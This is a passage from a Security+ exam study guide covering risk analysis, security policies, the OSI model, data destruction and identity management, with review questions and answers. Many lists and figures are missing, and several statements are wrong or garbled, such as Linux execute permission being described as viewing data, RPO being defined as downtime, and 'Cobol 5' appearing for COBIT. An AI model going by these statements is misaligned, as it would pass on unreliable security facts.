  10. Corrective control is a one-way function where an incident has happened and we want to redeem the situation. For example, if the hard drive on my laptop fails, then I will purchase a new hard drive, put it into my laptop, install the operating systems and application, then obtain a copy of my data from a backup.


  1. Hashing is a technique that lets you know if data has been tampered with, but it does not hide the data.

  2. If the same data is hashed with two different applications that can hash data with SHA1, then the hash value will be the same.

  3. HMAC provides data integrity and data authentication. You can use HMAC-SHA1 or HMAC-MD5.

  4. If I change firewall rules, I am doing this to reduce risk; it is carried out by administrators, therefore it is a technical control.

  5. A smart card is a credit card-type device that has a chip built in; once inserted into the keyboard or USB card reader, you will then be asked to enter a PIN.

  6. The person who stores and manages classified data is called the custodian. The person who gives access to the classified data is the security administrator. Prior to getting access to the data, the person may well be vetted.

  7. In the DAC model, the data is unclassified and the data creator who is also called the owner will decide who gains access to the data.

  8. Least privilege is a technique that says that people should only get the limited access to data that they need to perform their job.

  9. SELinux uses the MAC model to access data. This is the secure version of Linux.

  10. In Linux 777 give the owner who is the first digit, the group that is the send digit and all users who are the third group read, write, and execute. It could also be should a rwx.

  11. The Linux permission for execute (x) allows you to search for or view data.

  12. An access control method that applies either a time restriction or location restriction is called rule-based access.

  13. A subset of a department with access to a subset of duties is called role-based access.

  14. The defense in depth model has many different layers; the idea behind this is if one layer is broken through, the next layer will provide protection.

  15. When someone leaves the company, we should disable their account so that the keys associated with it are still available. The next stage is to change the password so nobody can access it, especially the person who has just left.

Conducting Risk Analysis

As a security professional, you will need to understand that identifying and managing risks can help to keep your company environment safe from various types of attacks. In this chapter we will look at types of threats and vulnerabilities and the role that different threat actors play.

We will cover the following exam objectives in this chapter:

Risk management

Risk management is the process of identifying risks within a company and making decisions about how to reduce the risks so that an incident does not cause harm to the company and its assets. You may not be able to eliminate the risk completely, but you may be able to put procedures in place to reduce it or keep it an acceptable level.

The first step in risk management is to identify the asset. Is it a top—secret document? If that was the case you'd limit the access to the document. The top—secret document would be stored in a secure area at all times; nobody would be able to take copies or photographs of it.

For example, if you had 1 kg of trash and you placed it outside your front door at night, you would be certain that in the morning it would still be there; however, if the asset was 1 kg of 24 carat gold and you left it outside your house at night, it would probably not be there in the morning.

The first step in risk management is identifying the asset because how we classify the asset will then determine how the asset is handled, stored, protected, and who has access to the asset.

Importance of policy, plans, and procedures

Creating policies, plans, and procedures is a part of risk management and helps reduce the attack surface and prevent incidents from happening. Let us look at the different type of policies that can be used.


Standard operating procedures

Standard Operating Procedures (SOP) give us step—by—step instructions as to how an activity is to be carried out. An example would be how to carry out the backing up of data. The SOP will state which data needs to be backed up daily, weekly, or monthly. Critical data would be backed up every two hours whereas archive data may be backed up monthly. The SOP would also state what the medium is to be used for the backup; it may be backed up to a NetApp or network share rather than to tape so that quicker recovery can be carried out.

Stage one in risk assessment is the classification of the asset; this then determines how it is accessed, stored, and handled.

Agreement types

Contracts between companies that want to purchase or sell services are very common as they protect both partners participating in the contract. We will now look at different agreement types that may be used in those contracts.

SLA is measure in metrics, as to what percentage has been achieved.


For example, your company has an SLA with a service provider that will fix the printer within 4 hours. If the printer breaks down then the service provider needs to repair the printer within four hours or face a penalty. An SLA only relates to one product or service at one time. A company may have several SLAs in place that cover all of their equipment.

Personnel management—policies and procedures

Employing personnel is a key function in a successful business; however, employing people is high risk as we need to employ the right type of person, who must be bright enough to identify cyber—crime attacks. To help reduce the risk that employees face or to prevent human resources from employing the wrong person and prevent fraud on an ongoing basis the following policies can be adopted:


Let's look at an example. All members of the IT team can make any changes to the network firewall; this creates a huge risk to the network. An auditor could recommend that each time a firewall rule is changed it is authorized by the Change Advisory Board and two people should be responsible for checking the changes to the firewall. With two people being responsible for making the changes, any errors should be eliminated. This is an example of separation of duties.

Let's look at a second example. When I first got married, we opened a joint back account that only my wages were paid into. My wife did the spending from this account even though she had her own account. I paid in, my wife withdrew—a true separation of duties. Nowadays I have my own account!

Separation of duties is where one person does not complete all configuration or transactions by themselves.


Other policies adopted by the company to help reduce risk are as follows:



Role—based awareness training

Role—based awareness training is mandatory training that an employee carries out on an annual basis; an example of this would be security awareness training that is used by companies to reduce their security risks. During the training, employees will learn about social engineering attacks where the employee is targeted, for example a phishing email. There will be more information about attacks in Chapter 8Protecting Against Attacks and Vulnerabilities, of this book.

Policy violation is where SOP and policies have been ignored. Transferring data from outside the company should be done via VPN.

General security policies

General security policies affecting an employee using the internet are:

Business impact analysis concepts

Business impact analysis (BIA) looks at the financial loss relating to an incident and does not look at how the threat or how an event occurred. It measures the additional cost due to various factors. 

Financial loss factors include the following:

Impact factors include the following:

BIA looks at the financial loss but does not look at the threat.

Privacy threshold assessment/privacy impact assessment

Personal data use, storage, and access are regulated and a company would be fined if they did not handle the data properly. There are two policies that we need to look at and these are the privacy threshold assessment and the privacy impact assessment. Let us now look at these:

Mission—essential functions/identification of critical systems

When we look at BIA as a whole we have to see what the company's mission—essential functions are; for example, an airline depends heavily on its website to sell airline tickets. If this was to fail it would result in a loss of revenue. Critical systems for the airline would be the server that the website was placed on and its ability to contact a backend database server such as SQL that would hold ticketing information and process the credit card transactions and order history for each of their customers.

Example

What would be the mission essential functions for a newspaper and what would be its critical systems?

Newspapers generate revenue not only via sales but more importantly by selling advertisement space in the paper. The mission—essential function would be the ad creation program that creates the advertisements and the critical systems would be the server that the program resides upon, the database for processing payments, and the systems used to print the newspapers.

Supply chain risk assessment

Your supply chain is the companies that you totally rely upon to provide the materials for you to carry out a business function or make a product for sale. Let's say that you are a laptop manufacturer and Company A provides the batteries and Company B provides the power supplies; if any of these runs short of either batteries or power supplies it stops you from manufacturing and selling your laptops.

Example

Company C provides your broadband internet access and you are totally reliant upon them for the internet—you may mitigate the risk of the internet failing by adopting vendor diversity, where you purchase broadband from Company D so that if either of your suppliers fails you still have internet access, which is now crucial to any modern business.

Business impact analysis concepts

The following concepts are used for determining the business impact analysis:

RPO is the acceptable downtime whereas RTO is the return to an operational state.

Calculating loss

The following concepts can be used to calculate the actual loss of equipment throughout the year and may be used to determine whether we need to take out additional insurance against the loss of the equipment:

Example

A multinational corporation loses 300 laptops annually and these laptops are valued at $850; would they take out an insurance policy to cover the costs of replacement if the insurance premiums were $21,250 monthly?

The answer is no, because the cost of replacing them is the same as the cost of the insurance, they would take a risk on not losing 300 laptops next year.

The calculations are as follows:

Annual loss expectancy = Single loss expectancy X Annual rate of occurrence.



Risk procedures and concepts

Risk is the probability that an event will happen—it could bring profit to you, for example if you place a bet on the roulette wheel in a casino then you win more money. It is, however, more likely that a risk will result in financial loss or loss of service. Companies will adopt a risk management strategy to reduce the risk being posed to them but may not be able to eliminate the loss completely. In information technology, newer technology comes out every day and poses more risk to a business so therefore risk management is ever evolving.

The main components are assets, risks, threats, and vulnerabilities:

A threat is something that will pose a danger by exploiting vulnerability. Vulnerability is a weakness that may be exploited and risk is the probability that an event will happen.

Threat assessment

A threat assessment helps a company classify its assets and then looks at the vulnerabilities of that asset. It will look at all of the threats the company may face, the probably of the threat happening, and the potential loss should the threat be successful:

Threat actors

A threat actor is another name for a hacker or attacker who is likely to attack your company; they all have different attributes. They will investigate your company from the outside looking for details or social media and search engines. Security companies provide an open source intelligence test and inform you of your vulnerabilities in terms of threat actors. Let us now look at threat actor types:

A competitor is a threat actor who will try and steal a company's trade secrets to gain a market edge.

Risk treatment

Risk treatment looks at each individual risk by the risk owner who is the best person to classify the asset; they will then decide what action is best to take to reduce the risk to the company. The risk will then be included in the company's risk register so that it can be monitored. New risks should be recorded in the risk register immediately and the risk register should be reviewed every six months as risks change frequently as technology changes.

Residual risk is the amount of risk remaining after you mitigate the risk. Remember you cannot eliminate a risk totally.

Risk register

When we look at the overall risk for the company we will use a risk register. This is a list of all of the risks a company could face. The risk to the finance department with be assessed by a the financial director and IT—related risk would be looked at by the IT manager. Each department can identify the assets, classify them, and decide on the risk treatment. The financial director and IT manager are known as risk owners—they are responsible for them:

Ser

Date

Owner

Description

Probability

Impact

Severity

Treatment

Contingency

Action taken

1

01/05/18

IT Manager

Loss of Switch

Low

High

High

Transfer—2—hour fix SLA

Purchase spare switch

02/05/2018







Qualitative/quantitative risk analysis

There are two different approaches to risk management and they are qualitative and quantitive risk assessments. Let us look at both of them:

In this example, we are going to grade a risk and its probability from 1—9, with 1 being low and 9 being high. If we look at the impact of losing a mail server, the qualitive risk analysis would say that it is high but the probability of losing it would be low:

Qualitative

Probability

Quantitative risk

9

3

9*3=27

Review questions

  1. What is the purpose of standard operating procedures?

  2. What is the purpose of BPA?

  3. What is the difference between an MOU and an MOA?

  4. What is the purpose of an ISA?

  5. What is the benefit of introducing separation of duties into the finance department?

  6. What is the purpose of a risk register?

  7. What is the purpose of job rotation?

  8. What is the purpose of mandatory vacations?

  9. What is the first stage in risk assessment?

  10. Why would a company introduce a clean desk policy?

  11. If someone brought their own laptop to be used at work apart from an On-Boarding policy,what other policy should be introduced?

  12. What is the purpose of an exit interview?

  13. When would you adopt risk avoidance?


  1. What is the purpose of risk transference?

  2. What are rules of behavior?

  3. Why would a company run an annual security awareness training programme?

  4. What is cognitive hacking and what should we avoid to mitigate it?

  5. What would happen if I tried to sell my car and sent an email to everyone who worked in my company using my Gmail account?

  6. Why would I make a risk assessment from one of my main suppliers?

  7. What is the driving force of Business Impact Analysis?

  8. What is the relationship between RPO and RTO?

  9. What information can be established from MTTR?

  10. What is the purpose of MTBF?

  11. What is the purpose of SLE and how is it calculated?

  12. How can we calculate the Annual Loss Expectancy (ALE)?

Answers and explanations

  1. Standard operating procedures are step-by-step instructions and how a task should be carried out so that employees know exactly what to do.

  2. A BPA is used by companies in a joint venture and it lays out each party's contribution, their right and responsibilities, how decisions are made, and who makes them.

  3. A Memorandum of understanding is a formal agreement between two parties but it is not legally binding whereas the memorandum of agreement is similar but is legally binding.

  4. An Interconnection Security Agreement (ISA) states how connections should be made between two business partners. They decide on what type of connection and how secure it for example they may use a VPN to communicate.

  5. If we adopted separation of duties in the finance department, we would ensure that nobody in the department did both parts of a transaction. For example, we would have one person collecting revenue and another person authorizing payments.

  6. A risk register lays out all of the risks that a company faces; each risk will have a risk owner who specializes in that area as well as the risk treatment.

  7. Job rotation ensures that employees work in all departments so that if someone leaves at short notice or is ill, cover can be provided. It also ensures that any fraud or theft can be detected.

  8. Mandatory vacations ensure that an employee takes at least five days of holiday and someone provides cover for them; this also ensures that fraud or theft can be detected.

  9. The first stage in risk assessment is identifying and classifying an asset. How the asset is treated, accessed, or scored is based on the classification.

  10. A Clean Desk policy is to ensure that no document containing company data is left unattended overnight.

  11. Someone bringing their own laptop is called BYOD and this is governed by two policies, the on—boarding policy and the Acceptable Use Policy (AUP). The AUP lays out how the laptop can be used, and accessing social media sites such as Facebook or Twitter are forbidden whilst using the device at work.

  1. An exit interview is to find out the reason why the employee has decided to leave; it may be the management style or that other factors in the company are not good. The information from an exit interview may help the employer improve terms and conditions and therefore have a higher retention rate.

  2. When a risk is deemed too dangerous or high risk and could end in loss of life or financial loss, we would treat the risk with risk avoidance and avoid the activity.

  3. Risk transference is where the risk is medium to high and you wish to offload the risk to a third party, for example insuring your car.

  4. Rules of behavior are how people should conduct themselves at work to prevent sexual discrimination, bullying, or discrimination.

  5. Annual security awareness training advises employees of the risk of using email, the internet, and posting information on social media websites. It also informs employees of any new risk posed since the last training.

  6. Cognitive hacking is where a computer or information system attack relies on changing human users' perceptions and corresponding behaviors in order to be successful. This is a social engineering attack and we could reduce the risk by being careful what we post on social media websites.

  7. Sending an email to everyone who works in your company using your Gmail account is a violation of the AUP and could lead to disciplinary action.

  8. A manufacturing company would carry out supply chain risk assessment as they need a reputable supplier of raw materials so that they can manufacture goods.

  9. Business impact analysis is just money; it looks at the financial impact following an event. The loss of earning, the cost of purchasing new equipment, and regulatory fines are calculated.

  10. The Recovery Point Object (RPO) is the acceptable downtime that a company can suffer without causing damage to the company, whereas the Recovery Time Object (RTO) is the time that the company is returned to an operational state—this should be within the RPO.

  11. Mean Time to Repair (MTTR) is the average time it takes to repair a system, but in the exam, it could be seen as the time to repair a system and not the average time.

  12. Mean Time Between Failure (MTBF) is the measurement of the reliability of a system.

  13. Single Loss Expectancy (SLE) is the cost of the loss of one item; if I lose a tablet worth $1,000, then the SLE is $1,000.

  14. The Annual Loss Expectancy (ALE) is calculated by multiplying the SLE by the ARO (the number of losses per year). If I lost six laptops a year worth $1,000 each, the ALE would be $6,000.

Implementing Security Policies and Procedures

In this chapter we will look at different frameworks and guides and how to best dispose of data, we will start off look at frameworks and reference architecture and guides.

We will cover the following exam objectives in this chapter:

Industry standard frameworks and reference architecture

Industry standard frameworks are a set of criteria within an industry relating to carrying out operations known as best practices; this is the best way that the operations should be set up and carried out. Best practice produces better results than a standard way of setting up the operations.

These industry standard frameworks are carried out by all members of that industry. In networking, the International Standard Organization (ISO) is responsible for the industry framework within communications and the IT industry. The ISO is a body comprised of international standards bodies that mainly look at communication.

Reference architecture is a document or a set of documents to which a project manager or other interested party can refer to for best practices; this will include documents relating to hardware, software, processes, specifications, and configurations, as well as logical components and interrelationships.

ISO/IEC 17789:2014 specifies the cloud computing reference architecture (CCRA). The reference architecture includes the cloud computing roles, cloud computing activities, and the cloud computing functional components and their relationships.

OSI reference model

ISO developed the Open Systems Interconnection model (OSI model). It is a conceptual model that standardizes the communication functions of a telecommunications or computing system, without regard to its internal structure and technology.

The purpose of the OSI reference model is to provide guidance to vendors and developers so that products they develop can communicate with one another.

The OSI reference model is a seven-layer model, and each layer provides specific services. The CompTIA Security + exam focuses mainly on layers 2, 3, and 7:

Layer

Description

Purpose

Packet structure

Devices

7

Application

The applications are windows sockets, such as HTTP for web browsers or SMTP for email.



6

Presentation

Formats data into a character format that can be understood. It can also encrypt data.



5

Session

Responsible for logging in and out.



4

Transport

TCP—connection orientated; UDP—connectionless

Datagrams


3

Network

Responsible for Internet Protocol (IP) addressing and packet delivery

Packets

Layer 3 switch

router

2

Data link

Works with Media Access Control (MAC) addresses. Checks for transmission errors from incoming data and regulates the flow of data

Frames

Switch

VLAN

IPSec

ARP

1

Physical

Transmits data in raw format bits over a physical medium (cables)

Bits

Hub repeater

Exam tip:
Although Security+ is not a networking exam, you must ensure that you are familiar with devices that operate at layers 2, 3, and 7. These will be covered fully in Chapter 5, Understanding Network Components, of this book.

TCP/IP model

The TCP/IP Protocol is the protocol or language used in modern communications; it is the only protocol used by the internet. The TCP/IP model is derived from the OSI reference model, and it is a four-layer model:

Layers

TCP/IP model layers

Corresponding OSI layers

4

Application

Application, presentation, and session

3

Transport

Transport

2

Internet

Network

1

Network

Data link and physical

Types of frameworks

There are different types of frameworks covered in the Security + exam, and these are listed here:

Benchmarks/secure configuration guides

Every company faces the challenge of protecting its servers and computers from an ever-increasing cyber security threat. There are many different types of servers: web servers, email servers, and database servers, and each of these has different configurations and services, so the baselines are different for each type of server. Vendors and manufacturers will provide platform/vendor guides so that their product can be configured as per their own best practices so that they perform as best they can.

Exam tip: Policies are written so that the security administrator knows what to configure, and end users know what part they play in keeping the company secure.

Policies and user guides

The management team will create policies that need to be adhered to by all employees, and these policies are created to help reduce the risk to the business and are mandatory; failure to carry out these policies is called policy violation and may lead to disciplinary action:

If a policy was created so that Data Loss Prevention (DLP) templates were created to prevent Personally Identified Information (PII) or sensitive data being emailed out of the company, hen the Security Administrators would know exactly what to so.

The purpose of policies is to ensure that the security administrator knows what tasks they need to perform and also that end users know what their responsibilities are within each policy. Policies are an administrative control to help reduce risk.

Exam tip:
The auditor is the snitch: they won't ever stop a process, but they always inform the management of non-compliance to company policies. The outcome following an audit will result in either change management or a new policy being written.

Change management requests are sent to a Change Management Board (CMB). The board looks at the change request, what the financial implications are, and how changing one process affects other processes. If the change is really major, then a new policy could be written rather than just change management.

Example: New laptops are being purchased and configured for use within the company. The auditor is reviewing the process and finds that there is no anti-virus software being installed on these laptops; therefore, they report this back to management. Management then looks at the processes that are laid down for configuring new laptops and then uses change management to change the processes so that in future anti-virus software is installed before rolling them out to the rest of the company.

Security configuration guides – web servers

There are two main web servers used by commercial companies. Microsoft has a web server called the Internet Information Server, and its rival is Apache. Web servers provide web pages for the public to view, and, because they are in the public domain, they are a prime targets for hackers. To help reduce the risk, both Microsoft and Apache provide security guides to help security teams reduce their footprint, making them more secure:

https://msdn.microsoft.com/en-gb/library/zdh19h94.aspx

Web server security guides rely upon the latest updates being in place, services that are not required being turned off, and the operating systems to be hardened, to make them as secure as possible and reduce the risk of attack.

Network infrastructure device user guides

CISCO produce the best high-end network devices, and, because the networking world is ever evolving, CISCO has produced an infrastructure upgrade guide so that companies can use it as a best practice when upgrading their network device. It can be seen at https://www.cisco.com/c/m/en_us/solutions/enterprise-networks/infrastructure-upgrade-guide.html.

General purpose guides

Security is critical for providing a safe working environment, and we now need to look at guidelines for vendor diversity, control diversity, technical controls, administrative controls, and the benefits of user training:

If we purchase the two firewalls from Vendor A, we may also have two firewalls from Vendor B with the same configuration kept in a secure area within your company. Should there be a failure with one of the firewalls or a vulnerability with the Vendor A firewall, then we can then quickly swap those with the firewalls from Vendor B. This ensures that the network remains secure at all times.

Implementing data security and privacy practices

One of the most critical areas in data security is the storing, accessing, and destroying of data when it is no longer required. In this section, we will look at the types, control, and destruction of data.

Destroying data and sanitizing media 

Data is controlled, handled, and stored based on its classification and privacy markings. Once this data has outlived its use, it needs to be destroyed so that it cannot be read by a third party. Data can be stored electronically on a computer's hard drive or kept as a hard copy by being printed. Most companies employ a third-party organization that specializes in data destruction and can provide a destruction certificate. Let's look at the different methods of destruction:


Destruction of hard drives can also be done by shredders that destroy the hard drive into smaller chunks. Take a look at the preceding photo, which shows the results of hard-drive shredding. Some hard-drive shredders can shred hard drives into much smaller chunks.

Data sensitivity labeling and handling

Securing and handling data is a critical part of security, as companies spend so much money completing the Research and Development (R&D) of a product because they don't want their competitors to know about their new product until it goes on the market. It is very important that the data is labeled according to its classification. Military data in the UK army is classified as unclassified, restricted, confidential, secret, and top secret, whereas a civilian company may classify data as confidential, private, public, and proprietary.

The first stage of risk management is classification of the asset, which determines how we handle, access, store, and destroy the data:

Data retention – legal and compliance

Data is retained either for legal reasons or to be compliant with statute law, which could be either the length of time the data should be retained or the national boundaries that data must be stored within. Multinational companies cannot just simply move data between national boundaries, as compliance forbids it:

Data roles

Everyone within a company will access data every day, but the company needs to control access to the data, and this is done by using data roles; we are now going to look at these roles:

Practical – creating a baseline

In this practical, we will download the Microsoft Baseline Security Analyzer (MBSA) tool, and then we will run the tool to see what missing patches and vulnerabilities it may have. The Windows 10 desktop that this demo will be run on has only recently had the latest update (two days ago):

  1. Go to Google and insert the latest MBSA download (the current link is https://www.microsoft.com/en-gb/download/details.aspx?id=75580; at the time of writing, this is MBSA 2.3):


  1. Select the language that you require, and then press Download:


  1. All Windows 10 and Windows 8 desktops use 64 bit; I have selected 64 bit with English as the language. Press Next. Allow popups, and then select Run:


  1. Press Next:


  1. Select I accept the license agreement, and press Next:


  1. In the wizard, you can select the destination folder; select Next in the screen that follows, and select Install. During the installation, the UAC prompt will appear. Select Allow, and then the installation will be complete:


  1. After the installation appears, there will be a shortcut on the desktop, as shown here:


  1. Double-click the desktop icon; select Allow when the UAC prompt appears, and then the MBSA interface will appear:


  1. From here, you can either scan a single computer or multiple computers; please select Scan a computer, and then press Start scan. At this stage, it downloads security update information from Microsoft, and this may take some time:


  1. This then performs a scan, checking security update information from Microsoft.

The outcome of the scan will be similar to this:


The default scan result shows the vulnerabilities in red; blue is informational, and green is for the items that are compliant. Where there are vulnerabilities in red, the MBSA has hyperlinks so that these items can be resolved and so the desktop can be made as secure as possible.

Review questions

  1. What is an industry standard framework?

  2. What is the OSI reference model, and how many layers does it have?

  3. What is the TCP/IP protocol, and where is it used?

  4. Which layer of the OSI reference model does a switch operate?

  5. Which layer of the OSI reference model does a router operate?

  6. What is a regulatory framework, and is it legally enforceable?

  7. What type of frameworks are ITIL and Cobol 5, and are they legally enforceable?

  8. What three policies are used in a BYOD environment, and what purpose does each of them serve?

  9. What would happen if I were in an internet café at an airport and did not connect to the company network using a VPN and the data was intercepted?

  10. The FBI were investigating John Smith; therefore, the IT team placed his account on Legal Hold. John Smith decided to leave the company on February 12, and the IT team decided to delete his account on April 12, as nobody from the FBI had requested any evidence. On April 13, the FBI contacted the company asking for evidence. What policy could have ensured that the evidence was available for the FBI?

  11. What is the purpose of auditing, what power does the auditor have, and what is the likely outcome after the audit?

  12. What is the purpose of change management?

  13. Why do vendors produce security guides?

  14. What is the purpose of vendor diversity?

  15. What is the purpose of control diversity?

  16. What type of control are penetration test or vulnerability scans?

  1. How do companies normally dispose of classified printed material?

  2. What is best way of disposing of a hard drive?

  3. What is the purpose of pulping, and when would it normally be carried out?

  4. What is the purpose of degaussing, and when will it be carried out?

  5. What is cluster tip wiping?

  6. If the company held information marked Public and Private, why would we then introduce classifications such as confidential and proprietary?

  7. Who is responsible for the securing and backing up of data?

  8. Who is responsible for allowing access to the data?

  9. What is the purpose of a privacy officer?

Answers and explanations

  1. Industry standard frameworks are a set of criteria within an industry, relating to carrying out operations known as best practices. This is the best way that the operations should be set up and carried.

  2. The Open Systems Interconnection model (OSI model) is a conceptual model that standardizes the communication functions of a telecommunications or computing system without regard to its internal structure and technology. It has seven layers—application, presentation, session, transport, network, data link, and physical; these are layers seven, down to layer one.

  3. The TCP/IP protocol is the only protocol used in the internet, and most networks use it; each computer has an IP address to identify it.

  4. A switch operates at layer 2: the data link layer. There is a multilayer switch that works at layer 3, but the exam focuses on a switch and VLAN operating at layer 2. A switch is an internal device.

  5. A router whose function is to join networks together works at layer 3: the network layer. A router operates as an external device.

  6. A regulatory framework is based on statute law and governmental regulations; is it legally enforceable?

  7. ITIL and Cobol 5 are Non-Regulatory. These are not enforceable by law and are optional, but they provide a framework for companies to follow as a best practice for IT service management.

  8. The three types of policies needed for a BYOD environment are on-boarding, off-boarding, and Acceptable User Policy (AUP). The on-boarding policy states what needs to be done before a device can be allowed access to the network, the AUP states how the device should be used and restricts access to games and social media. When the exam mentions a BYOD environment, think of on-boarding and AUPs. The off-boarding policies state how to decommission a device from your network.

  9. Not using a VPN to connect to your network would be a policy violation against the remote access policy and would lead to disciplinary action being taken against the perpetrator.

  1. A data retention policy stating that data should be kept for six months following a person leaving the company, or the data retention policy could state never delete data that has been placed on Legal Hold. Both of these would ensure that the FBI got its data.

  2. The role of the auditor is to ensure that the company's policies and processes are being carried out, following an audit—either change management or the creation of a new policy are the likely outcomes.

  3. Change management regulates changes within a company so that they are controlled and risk is managed effectively. This stop employees doing their own thing.

  4. Vendors produce security guides so that their products can be set up by their best practices, making them as secure as possible.

  5. Vendor diversity provides reliability and resiliency by having more than one solution in place; should one solution fail, then the company is still up and running. Business continuity is covered later in this book.

  6. Should one control fail, then another is in place; an example of this is if an attacker gets over the perimeter fence, then a guard with a guard dog would stop them going any further.

  7. Penetration test or vulnerability scans are administrative controls; the vulnerability scan is less intrusive.

  8. Classified printed document are normally put in burn bags that are collected by a third-party agency, who then incinerates them and provides the company with a destruction certificate.

  9. The best way to destroy a hard drive would be to shred it. Pulverizing is an alternative, but it is not as effective.

  10. Pulping can turn shredded paper into a sludge by using water or sulfuric acid. Try and read it now!

  11. Degaussing is where a magnetic field is applied to a hard drive, or a tape drive, to remove the data.

  12. Cluster tip wiping is removing the last remnants of data stored in the last data cluster.

  13. By having four classifications rather than two classifications, it can lead to better classifications of the data.

  14. The custodian is responsible for securing and backing up data.

  15. The security administrator is responsible for granting access to the data. Remember: this is not the owner.

  16. The privacy officer is concerned with who is accessing the data and how is it shared; for example: are only doctors able to see a patient's medical history?

Delving into Identity and Access Management

In this chapter we will look at different types of authentication and how to dispose of data, we will first look at identify and access management concepts.

We will cover the following exam objectives in this chapter:

Understanding identity and access management concepts

One of the first areas in IT security is giving someone access to the company's network to use resources for their job. Each person needs some form of identification so that they can prove who they are; it could be anything ranging from a username to a smart card. It needs to be unique so that the person using that identity is accountable for its use. The second part after proving your identity is to provide authorization for that identity; this can be done in many ways for example inserting a password or if you have a smart card it would be a PIN.

Passwords

Passwords are one of the most common ways of authenticating a user; they are also the authentication factor that is most likely to be inserted incorrectly, maybe because they use higher and lower-case characteristics, numbers, and special characters not seen in programming. Some people may have the caps lock reversed without knowing it. When the password is inserted, it is shown as a row of dots therefore users cannot see their input, however, in the password box in Windows 10 you can press the eye to see the password that you have inserted. This reduces the risk of people being locked out.

Default/administrator password

An administrator should have two accounts, one for day-to-day work and the other for administrative tasks. If your company is using a device such as a wireless router, the default administrative username and password should be changed as they are normally posted on the internet and could be used for hacking your device/network.

Passwords—group policy

A group policy allows security administrators to create settings once and then push them out to all machines in their domain. This could cover maybe 5-10,000 machines. It reduces configuration errors and reduces the labor required to carry out the task. One portion of a group policy deals with passwords; please look at the screenshot:


Figure 1: Password policies

Let us look at each of these going from the top to the bottom.

If I choose the password P@$$w0rd, then it contains characters from all four groups but it would be cracked very quickly as most password crackers replace the letter o with a zero and replace an a with the @ sign.

Store passwords using reversible encryptionThis is when a user needs to use his credentials to access a legacy (old) application, because it is storing them in reversible encryption they could be stored in clear text—this is not good. Companies tend to have this option disabled at all times as it poses a security risk.

When purchasing devices, you should always change the default password that the manufacturer has set up to prevent someone hacking into your device.

Once you are locked out your account is disabled:


Figure 2: Account lockout

Know the password options and types of password attacks thoroughly.

Account lockout duration: Both Account lockout duration and Reset account lockout counter after should not be enabled. If these are disabled the person locked will have to contact the security administrator to have their password reset; this way the administrator knows who keeps for getting their password and knows to keep monitoring them.

Password recovery

People can be locked out from time to time by forgetting their password. They can reset their passwords by going to a portal and selecting forgotten my password, then filling in personal details and having the password reset option send a code to their phone via SMS, or by email.

Some desktop operating systems allow you to create a password reset disk so that you can save to a SD card or a USB drive; this is not normally used in a corporate environment.

Authentication factors

There are different authentication factors that range from something you know, for example a password, to something you are using, for example an iris scanner. The following are the different authentication factors:


Figure 3: Hardware token and key fob used with proximity card

Number of factor examples

Let us look at combining the different factors to determine single factor, dual factor, or multifactor. Here are different factor examples:

The number of factors is determined by the different numbers of factor groups being mentioned.

Transitive trust

Transitive trust is where you have a parent domain and maybe one or more child domains; these would be called trees. Refer to the diagram:


Figure 4: Transitive trust

Between the parent domain and each child domain is two-way transitive trust, where resources can be shared two ways. Because the parent domain trusts both child domains A and B, it can be said that Child A transitively trusts Child B as long as the administrator in Child B wishes to give someone from Child A access to resources and vice versa. Think of a domain as being people from the same company.

When the exam mentions third-party to third-party authentication, then that can only be federation services.

Federation services

Federation services are used when two different companies want to authenticate between each other when they participate in a joint venture. Think of two car manufacturers wanting to produce the best car engine in the world. Both companies have experts on engines but they want to work together to produce a super engine.

The companies don't want to merge with each other; they want to retain their own identify and have their own management in place. These are known, to each other, as third parties.

Each of these companies will have their own directory database, for example an active directory that will only have users from their domain. Therefore, normal domain authentication will not work. Let us now look at the two different domains and their directory databases:


Figure 5: Directory databases

Company A has three users in his active directory: Mr Red, Mr Blue, and Mr Green. Company B also has three users: Mr Orange, Mr Purple, and Mr Yellow. This means that they can only change passwords for the people in their own domain.

If Mr. Orange was to try and access the Company A domain he would need an account. Since he does not have an account the security administrator from Company A has no way of providing authentication. He then needs to make an agreement with Company B to set up a federation trust where the people from the other domain would need to use alternative credentials instead of a username and password or a smart card and PIN. They use extended attributes:

User-extended attributes are extended attributes used by their directory services; they are, in addition to the basic attributes:

They both have decided that the extended attributes that they will use will be the user's email address. Because an email address is easy to find or guess they will also need to use their domain password. This is known as a claim. When the exam talks about authentication using the phrase third party or extended attributes, think of federation services.

The two companies need to exchange the extended attribute information and need a special protocol to do that, so they use Security Assertion Mark-up Language (SAML) as it is XML based authentication:


Figure 6: SAML

Federation Services—Authentication: In this scenario Mr. Yellow is going to authenticate himself with Company A so that he can access limited resources. He contacts Company A through a web browser and it asks him for his email address and password:


Figure 7

Federation Services—Exchange of Extended Attributes: Company A now uses SAML to send the authentication details of Mr Yellow to Company B. Mr Yellow's domain controller confirms that they are correct:


Figure 8: Extended attributes sent to Company A using SAML

Once Company B confirms that Mr Yellow's extended attributes are valid the Company A domain controller sends a certificate to Mr Yellow's laptop; this certificate is used next time for authentication.

When the exam mentions authentication using extended attributes, they can only be federation services.

Shibboleth

Shibboleth is an open source federation service product that uses SAML authentication. It would be used in a small federation service environment.

Single sign-on

Single sign-on is used in a domain environment; this is where someone logs in to the domain and then can access several resources such as the file or email server without needing to input their credentials again. Think of it as an all-inclusive holiday where you book into your hotel and the receptionist gives you a wristband that you produce when you want to consume food and drink. federation services and Kerberos (Microsoft authentication protocol) are both good examples of single sign-on. You log in once and access all of your resources without needing to insert your credentials again.

Installing and configuring identity and access services

Identify management in a corporate environment will use a directory database we are going to look at Microsoft's Active Directory, where a protocol called Lightweight Directory Access Protocol manages the users are groups. Let us look at how it works.

LDAP

Most companies have identity and access services through a directory services that stores objects such as users and computer as X500 objects; these were developed by the International Telecommunication Union (ITU). These object form what is called a distinguished name and are organized and stored by the Lightweight Directory Access Protocol (LDAP).

There are only three values in X500 objects; these are DC (domain), Organization Unit (OU), and CN (anything else).

In this example, we have a domain called Domain A and an organizational unit called Sales; this is where all of the sales department users and computers would reside. We can see inside the Sales OU a computer called Computer 1:


Figure 9: Active Directory

When creating the X500 object we start off with the object itself, Computer 1, and then continue up through the structure. As Computer 1 is neither an OU or domain, we give it a value of CN, then we move up the structure to Sales. As it is an OU, we give it that value. Computer 1 is a CN, sales is a OU and the domain is into two portions, each having the value of DC. The distinguished name is here:

CN=Computer1, OU=Sales, DC=DomainA, DC=com

The way it is stored in the active directory can be viewed using a tool called ADSI Edit:


Figure 10: ADSI Edit

LDAP is the active directory storeman responsible for storing the X500 objects; when the Active Directory is searched, then LDAP provides the information required. LDAPS is the secure version of LDAP.

Examples:

Kerberos

